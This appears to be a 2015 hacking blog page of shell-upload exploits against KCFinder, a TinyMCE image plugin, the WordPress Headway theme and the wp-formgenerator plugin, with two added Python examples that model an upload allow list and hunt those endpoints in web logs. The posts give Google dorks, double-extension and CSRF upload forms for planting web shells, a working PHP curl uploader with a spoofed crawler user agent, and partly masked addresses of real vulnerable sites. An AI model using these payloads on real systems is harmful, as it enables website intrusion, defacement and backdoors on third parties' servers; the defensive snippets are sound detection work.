Saturday, 31 October 2015

KCFinder Upload Shell Vulnerability



#-  Exploit Title : KCFinder Upload Shell Vulnerability
#- Exploit Author : Iranian_Dark_Coders_Team
#- Google Dork : inurl:/kcfinder/browse.php
#- Date : 24/04/2014
#- Home : www.idc-team. net
#- Discovered By : Black.Hack3r
#- Vendor Homepage : kcfinder.sunhater. com
#- Version : 2.51 - 2.53
#- Tested on : Windows 8 & Linux

=================================================

 [+] Events location bug:

 [+] http://127.0.0.1/path/kcfinder/config.php

  Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",



 [+] Exploit:
 
 [+] http://127.0.0.1/kcfinder/browse.php
 [+] http://127.0.0.1/[path]/kcfinder/browse.php



 [+] Proof Of Concept

Trick 1 ~~
 
1 > Go to target link
    http://localhost/KCFinder/browse.php

2 > Then select your folder from the left panel

3 > Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defacepage.html ]

4 > Shell Access ?
      {here}
       

Trick 2 ~~

Where is vulnerability ? "localhost/path/kcfinder/upload.php"

How to ??  You can use CSRF :) 

<form method="POST" action="http://web. com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form> 

Shell Access ? {here}

 [+] Demo site:

 [+] http://www.basukiwat**.com/assets/js/mylibs/kcfinder/browse.php
 [+] http://www.padel4**.be/kcfinder/browse.php
 [+] http://goyathlaysvintagepavonirestoratio**.com/kcfinder/browse.php



 [+] Discovered By : Black.Hack3r
 [+] We Are : M.R.S.CO,Black.Hack3r,N3O,D$@d_M@n,KurD_HaCK3R,HOt0N
 [+] SpTnx  : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
 [+] Home : www.idc-team. net
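
Why the file names in step 3 get through, as an added example that is not part of the original advisory or KCFinder's own code: the deny list quoted from config.php is modeled in Python next to an allow-list check. Matching on the last extension only and the `ALLOWED_EXTS` set are assumptions.

```python
import os

# Deny list copied from config.php line 51 as quoted in the advisory.
DENIED_EXTS = "exe com msi bat php phps phtml php3 php4 cgi pl".split()

# Assumption (not KCFinder's own values): the only types this install needs.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}

# Constructed sample: the names from step 3 plus one legitimate image.
SAMPLES = ["shell.php2", "shell.php5", "shell.php.black",
           "shell.shtml", "defacepage.html", "photo.JPG"]


def deny_list_accepts(name):
    """Model of a last-extension deny-list check (assumed behaviour)."""
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    return ext not in DENIED_EXTS


def allow_list_accepts(name):
    """Accept only 'basename.ext' where ext is on the allow list.

    Rejecting names with more than one dot closes the double-extension
    case, where a web server may still map an inner '.php' to a handler.
    """
    base = os.path.basename(name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1] in ALLOWED_EXTS


def compare(names=SAMPLES):
    """Return {name: (deny_list_result, allow_list_result)}."""
    return {n: (deny_list_accepts(n), allow_list_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, (deny, allow) in compare().items():
        print(f"{name:18} deny-list={'accept' if deny else 'reject'} "
              f"allow-list={'accept' if allow else 'reject'}")
```

Every name from step 3 passes the deny list and fails the allow list; only the image is accepted by both. Serving the upload directory with script execution disabled covers whatever a name check misses.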




Exploit JustBoil TinyMCE Images Upload Unrestricted #issue


#-Title: Exploit JustBoil TinyMCE Images Upload Unrestricted #issue
#-Author: Goginho
#-Date: 10/31/2015
#- Vendor : justboil
#- Link Download : github. com/vikdiesel/justboil. me
#- Tested on : Trusty Tahr / ubuntu
#- Fixed in ??
==========================================================================

Proof Of Concept :

[#] Google Dork: 
intext:"{#jbimages_dlg.select_an_image}"
inurl:"/plugins/jbimages/"

[#] Vulnerability / Exploit : "/public/js/tiny_mce/plugins/jbimages/dialog.htm"

[#] When Vulnerable :



This is just an issue; you can probably exploit this plugin.

Shell Access ? hmm .. 

Tuesday, 27 October 2015

Wordpress Headway Themes Shell Upload Vulnerability



#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

· Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php
· When Vulnerable /home/localhost/public_html/


Proof Of Concept :


Tools Coded by Mr.MaGnoM

<?php


/*
link of tool with video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didn't make an auto exploiter: because the headway theme doesn't have one name
for example you will find /headway-2014/ and /headway-2015/ or /headway-163/ , /headway-120/
so it is so difficult to make an auto exploiter, so you must first check the complete name of the theme, then

write it on site.com/wp-content/themes/headway(complete name)/library/visual-editor/lib/upload-header.php

shell goes to : site/wp-content/uploads/headway/header-uploads/shell (stable for all sites)

that script in php is for exploiting site by site :/

to understand well, watch the video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/


$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
  echo "\nnot infected\n";
}

?>

Shell Access ?  Here


Monday, 26 October 2015

Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities




#-Title: Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities
#-Author: unknown
#-Date: 10/26/2015
#- Vendor : CodeCanyon
#- Link Download : codecanyon. net/item/form-generator-wordpress-form-builder/4613911
#-Google Dork: inurl:wp-content/plugins/wp-formgenerator
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

Vulnerability : "/wp-content/plugins/wp-formgenerator/uploads/php"
 When Vulnerable {"files":[]}

Proof Of Concept :

Use CSRF :

<form method="POST" action="Zembut/wp-content/plugins/wp-formgenerator/uploads/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form>


Shell Access ? Here
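
For defenders, the upload endpoints named in the KCFinder, Headway and wp-formgenerator posts on this page can be hunted in web access logs. This added example (not part of the original posts) runs three rules over constructed log lines; the rule names, the bot user-agent pattern and the script-extension list are assumptions.

```python
import re

# Upload endpoints named in the three advisories on this page.
UPLOAD_ENDPOINTS = (
    "/kcfinder/upload.php",
    "/library/visual-editor/lib/upload-header.php",
    "/wp-content/plugins/wp-formgenerator/uploads/php",
)
# Destination directory stated in the Headway tool's comments.
HEADWAY_DROP_DIR = "/wp-content/uploads/headway/header-uploads/"
# Assumption: extensions a server might hand to an interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phps|shtml|cgi|pl)(\.|$)", re.I)
# Assumption: crawler names; a search bot has no reason to POST a file.
BOT_UA = re.compile(r"msnbot|googlebot|bingbot", re.I)

# Apache/nginx "combined" log format.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [27/Oct/2015:10:01:02 +0000] "POST /wp-content/themes/headway-2015/library/visual-editor/lib/upload-header.php HTTP/1.1" 200 1 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
198.51.100.7 - - [27/Oct/2015:10:01:09 +0000] "GET /wp-content/uploads/headway/header-uploads/lolz.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Oct/2015:10:02:00 +0000] "GET /wp-content/uploads/headway/header-uploads/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Oct/2015:10:03:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [31/Oct/2015:08:00:00 +0000] "POST /assets/kcfinder/upload.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""


def findings(log_text=SAMPLE_LOG):
    """Return (ip, rule, path) tuples for log lines that match a rule."""
    out = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and any(e in path for e in UPLOAD_ENDPOINTS):
            rule = "bot-ua-upload" if BOT_UA.search(m["ua"]) else "upload-endpoint"
            out.append((m["ip"], rule, path))
        elif HEADWAY_DROP_DIR in path and SCRIPT_EXT.search(path):
            out.append((m["ip"], "script-in-upload-dir", path))
    return out


if __name__ == "__main__":
    for hit in findings():
        print(*hit)
```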